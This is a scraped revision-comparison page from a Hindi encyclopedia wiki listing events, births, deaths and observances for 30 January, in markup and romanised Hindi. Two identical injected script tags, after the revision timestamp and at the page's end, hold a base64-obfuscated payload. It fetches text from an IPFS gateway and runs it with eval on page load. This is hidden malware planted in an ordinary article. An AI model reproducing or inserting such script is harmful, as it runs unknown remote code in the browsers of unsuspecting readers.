Difference between revisions of "30 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "अफगान" to "अफ़ग़ान")
(6 intermediate revisions by 5 users not shown)
Line 17: Line 17:
 
* [[1943]] - स्टालिन ग्राफ़ के पास सोवियत फ़ौजों से जर्मन सेना हारी।
 
* [[1943]] - स्टालिन ग्राफ़ के पास सोवियत फ़ौजों से जर्मन सेना हारी।
 
* [[1948]] - [[महात्मा गांधी]] की हत्या हुई।
 
* [[1948]] - [[महात्मा गांधी]] की हत्या हुई।
 +
* [[1949]] - रात्रि एयर मेल सेवा की शुरूआत हुई।
 
* [[1957]] - राष्ट्र संघ ने [[दक्षिण अफ़्रीका]] को अपनी नस्ल भेदी नीति पर पुनर्विचार करने के लिए कहा।
 
* [[1957]] - राष्ट्र संघ ने [[दक्षिण अफ़्रीका]] को अपनी नस्ल भेदी नीति पर पुनर्विचार करने के लिए कहा।
 
* [[1964]] - दक्षिण वियतनाम में सेना ने सत्ता पर कब्ज़ा किया।
 
* [[1964]] - दक्षिण वियतनाम में सेना ने सत्ता पर कब्ज़ा किया।
 +
* [[1971]] - इंडियन एयरलाइंस के ‘फोकर फ्रेंडशिप विमान’ का अपहरण।
 
* [[1972]] - [[पाकिस्तान]] ने 'राष्ट्रमंडल' से अपना नाम वापस लिया।
 
* [[1972]] - [[पाकिस्तान]] ने 'राष्ट्रमंडल' से अपना नाम वापस लिया।
 
* [[1974]] - इंडियन एयरलाइंस के 'फोकर फ़्रेंडशिप विमान' का अपहरण हुआ।
 
* [[1974]] - इंडियन एयरलाइंस के 'फोकर फ़्रेंडशिप विमान' का अपहरण हुआ।
 
* [[1979]] - रोडेशिया में नया संविधान बना, जिसमें अश्वेतों को सत्ता में भागीदारी का अधिकार मिला।
 
* [[1979]] - रोडेशिया में नया संविधान बना, जिसमें अश्वेतों को सत्ता में भागीदारी का अधिकार मिला।
 
* [[1988]] - [[कंबोडिया]] में 'नरोत्तम सिंहानुक' ने इस्तीफ़ा दिया।  
 
* [[1988]] - [[कंबोडिया]] में 'नरोत्तम सिंहानुक' ने इस्तीफ़ा दिया।  
 +
* [[1989]] - [[अमेरिका]] ने [[अफ़ग़ानिस्तान]] के [[काबुल]] में अपना दूतावास बंद किया।
 +
* [[1991]] - इराकी सेना ने सउदी अरब की सीमा के नजदीक एक शहर पर कब्जा कर लिया। इस हमले में 12 अमेरिकी सैनिक मारे गए।
 
* [[1997]] - सैंतालिस [[वर्ष|वर्षों]] बाद [[महात्मा गांधी]] की अस्थियाँ [[संगम इलाहाबाद|संगम]] में विसर्जित।
 
* [[1997]] - सैंतालिस [[वर्ष|वर्षों]] बाद [[महात्मा गांधी]] की अस्थियाँ [[संगम इलाहाबाद|संगम]] में विसर्जित।
 
* [[2001]] - [[गुजरात]] में आये भूकम्प के बाद महामारी की आशंका को रोकने के लिए पुनर्वास के और उपाय। भूकम्प में मरने वालों की संख्या 30 हज़ार तक पहुँची।
 
* [[2001]] - [[गुजरात]] में आये भूकम्प के बाद महामारी की आशंका को रोकने के लिए पुनर्वास के और उपाय। भूकम्प में मरने वालों की संख्या 30 हज़ार तक पहुँची।
Line 29: Line 33:
 
**वियतनाम में बर्ड फ़्लू से 12 लोग मरे।
 
**वियतनाम में बर्ड फ़्लू से 12 लोग मरे।
 
**इराक में सम्पन्न चुनाव में 72 प्रतिशत मतदान। रूस के मरात साफिन ने आस्ट्रेलियाई ओपन का पुरुष एकल खिताब जीता।  
 
**इराक में सम्पन्न चुनाव में 72 प्रतिशत मतदान। रूस के मरात साफिन ने आस्ट्रेलियाई ओपन का पुरुष एकल खिताब जीता।  
* [[2006]] - इस्रायल ने फिलीस्तीन में हमास की जीत के कारण वित्तीय सहायता की योजना पर रोक लगाई।  
+
* [[2006]] - इस्रायल ने फ़िलिस्तीन में हमास की जीत के कारण वित्तीय सहायता की योजना पर रोक लगाई।  
 
* [[2007]] - टाटा ने एंग्लो डच स्टील निर्माता कंपनी कोरस ग्रुप को 12 अरब डॉलर से अधिक में ख़रीदा।  
 
* [[2007]] - टाटा ने एंग्लो डच स्टील निर्माता कंपनी कोरस ग्रुप को 12 अरब डॉलर से अधिक में ख़रीदा।  
 
* [[2008]] -  
 
* [[2008]] -  
Line 35: Line 39:
 
**फीजी में आये उच्च उष्ण कटिबन्धीय तूफान ने भारी तबाही मचायी।  
 
**फीजी में आये उच्च उष्ण कटिबन्धीय तूफान ने भारी तबाही मचायी।  
 
* [[2009]]- आस्ट्रेलिया ओपन के मिक्स्ड डबल मुक़ाबले में [[सानिया मिर्ज़ा]] व [[महेश भूपति]] की जोड़ी फाइनल में पहुँची।  
 
* [[2009]]- आस्ट्रेलिया ओपन के मिक्स्ड डबल मुक़ाबले में [[सानिया मिर्ज़ा]] व [[महेश भूपति]] की जोड़ी फाइनल में पहुँची।  
 +
* [[2010]] - विश्व के नंबर एक खिलाड़ी रोजर फेडरर ने [[ब्रिटेन]] के एंडी मरे को हराकर, नंबर एक महिला खिलाड़ी अमेरिका की सेरेना विलियम्स ने बेल्जियम की जस्टिन हेनिन को हराकर तथा लिएंडर पेस और जिंबाब्वे की कारा ब्लैक की जोड़ी ने ऑस्ट्रेलियाई ओपन में क्रमशः पुरुष एकल, महिला एकल और मिक्स्ड डबल्स खिताब जीता।
 
==30 जनवरी को जन्मे व्यक्ति==
 
==30 जनवरी को जन्मे व्यक्ति==
 
* [[1890]] - [[जयशंकर प्रसाद]] - हिन्दी साहित्यकार, प्रमुख रचनाएँ- [[कामायनी]], चन्द्रगुप्त
 
* [[1890]] - [[जयशंकर प्रसाद]] - हिन्दी साहित्यकार, प्रमुख रचनाएँ- [[कामायनी]], चन्द्रगुप्त
Line 41: Line 46:
 
* [[1927]] - ओलोफ़ पाल्मे का जन्म।
 
* [[1927]] - ओलोफ़ पाल्मे का जन्म।
 
==30 जनवरी को हुए निधन==
 
==30 जनवरी को हुए निधन==
 +
* 1530 - [[राणा संग्राम सिंह]] - [[मेवाड़]]।
 
* [[1948]] - [[महात्मा गाँधी]] - [[भारत]] के राष्ट्रपिता
 
* [[1948]] - [[महात्मा गाँधी]] - [[भारत]] के राष्ट्रपिता
 
* [[1968]] - [[माखन लाल चतुर्वेदी]] - हिन्दी साहित्यकार
 
* [[1968]] - [[माखन लाल चतुर्वेदी]] - हिन्दी साहित्यकार
 
+
* [[1960]] - [[नाथूराम प्रेमी]] - प्रसिद्ध लेखक, [[कवि]], भाषाविद और सम्पादक।
 +
**[[जे.सी. कुमारप्पा]] - [[भारत]] के एक अर्थशास्त्री थे।
 
==30 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==30 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
* [[शहीद दिवस]]
+
* [[शहीद दिवस (गाँधी जी)|शहीद दिवस]]
* [[कुष्ठ निवारण दिवस]]
 
* [[सर्वोदय दिवस]]
 
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==

Revision as of 11:14, 5 July 2017

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 30 janavari varsh ka 30 vaan din hai. sal mean abhi aur 335 din shesh haian. (lip varsh mean 336 din)

30 janavari ki mahattvapoorn ghatanaean

  • 1522 - lyoobek aur denamark ke bich yuddh.
  • 1641 - purtagal ne malakka ki kha di v malaya dachoan ko sauanp di.
  • 1648 - spen aur h aaulaiand ke bich shaanti samajhauta hua.
  • 1649 - ianglaiand ke samrat 'charls pratham' ko faansi di gee.
  • 1788 - briten ke rajakumar' charls edavard stuart' ki rom mean maut ho gayi.
  • 1790 - laifabot ke taur par nirmit pahali nav ka tayan nadi mean parikshan.
  • 1902 - chin aur koriya ki svatantrata ke bare mean briten aur japan ke bich pahali 'aangl-japani sandhi' par landan mean hastakshar hue.
  • 1903 - l aaurd karzan ne metakaf h aaul mean 'ianpiriyal laibreri' ka udghatan kiya.
  • 1911 - 'kainediyan neval sarvis' ka nam badalakar 'r aauyal kainediyan nevi' kiya gaya.
  • 1913 - 'haus af l aaurds' ne airish hom rool bil ko kharij kiya.
  • 1933 - ed aaulf hitalar ne adhikarik roop se jarmani ke chaansalar ki kaman sambhali.
  • 1943 - stalin graf ke pas soviyat faujoan se jarman sena hari.
  • 1948 - mahatma gaandhi ki hatya huee.
  • 1949 - ratri eyar mel seva ki shurooat huee.
  • 1957 - rashtr sangh ne dakshin afrika ko apani nasl bhedi niti par punarvichar karane ke lie kaha.
  • 1964 - dakshin viyatanam mean sena ne satta par kabza kiya.
  • 1971 - iandiyan eyaralaians ke ‘phokar phreandaship viman’ ka apaharan.
  • 1972 - pakistan ne 'rashtramandal' se apana nam vapas liya.
  • 1974 - iandiyan eyaralaians ke 'phokar freandaship viman' ka apaharan hua.
  • 1979 - rodeshiya mean naya sanvidhan bana, jisamean ashvetoan ko satta mean bhagidari ka adhikar mila.
  • 1988 - kanbodiya mean 'narottam sianhanuk' ne istifa diya.
  • 1989 - amerika ne afaganistan ke kabul mean apana dootavas band kiya.
  • 1991 - iraki sena ne sudi arab ki sima ke najadik ek shahar par kabja kar liya. is hamale mean 12 ameriki sainik mare ge.
  • 1997 - saiantalis varshoan bad mahatma gaandhi ki asthiyaan sangam mean visarjit.
  • 2001 - gujarat mean aye bhookamp ke bad mahamari ki ashanka ko rokane ke lie punarvas ke aur upay. bhookamp mean marane valoan ki sankhya 30 hazar tak pahuanchi.
  • 2003 - eriyal sheron ne arafat ka shaanti varta prastav ko thukaraya.
  • 2005 -
    • viyatanam mean bard floo se 12 log mare.
    • irak mean sampann chunav mean 72 pratishat matadan. roos ke marat saphin ne astreliyaee opan ka purush ekal khitab jita.
  • 2006 - israyal ne filistin mean hamas ki jit ke karan vittiy sahayata ki yojana par rok lagaee.
  • 2007 - tata ne eanglo dach stil nirmata kanpani koras grup ko 12 arab d aaular se adhik mean kharida.
  • 2008 -
    • chennee ki ek vishesh adalat ne bahucharchit stamp ghotale ke mamale ke mukhy aropi abdul karim telagi ko 10 sal ki saza sunaee.
    • phiji mean aye uchch ushn katibandhiy toophan ne bhari tabahi machayi.
  • 2009- astreliya opan ke miksd dabal muqabale mean saniya mirza v mahesh bhoopati ki jo di phainal mean pahuanchi.
  • 2010 - vishv ke nanbar ek khila di rojar phedarar ne briten ke eandi mare ko harakar, nanbar ek mahila khila di amerika ki serena viliyams ne beljiyam ki jastin henin ko harakar tatha lieandar pes aur jianbabve ki kara blaik ki jo di ne aaustreliyaee opan mean kramashah purush ekal, mahila ekal aur miksd dabals khitab jita.

30 janavari ko janme vyakti

30 janavari ko hue nidhan

30 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>